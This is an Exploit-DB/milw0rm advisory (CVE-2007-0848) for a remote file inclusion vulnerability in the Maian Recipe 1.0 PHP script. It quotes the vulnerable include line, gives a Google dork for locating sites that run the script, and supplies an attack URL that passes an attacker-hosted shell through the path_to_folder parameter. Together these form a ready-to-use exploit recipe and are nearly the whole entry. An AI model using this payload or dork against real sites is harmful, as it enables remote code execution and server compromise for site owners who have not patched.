Maian Recipe 1.0 path_to_folder Remote File Include Vulnerability

2007-02-07T00:00:00
ID EDB-ID:3284
Type exploitdb
Reporter Denven
Modified 2007-02-07T00:00:00

Description

Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability. CVE-2007-0848. Webapps exploit for php platform

                                        
                                            *****************
Found by Denven *
*****************
*****************
*****************
Script: http://www.maianscriptworld.co.uk/freestuff_1975_recipe.html
*****************
Google Dork: "Powered by Maian Recipe v1.0"
*****************
ERROR:
classes/class_mail.inc.php :

include($path_to_folder.'classes/class.phpmailer.php');


****************************************************************************
**********
RFI:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]

****************************************************************************
**********
denven[at]gmail[dot]com

# milw0rm.com [2007-02-07]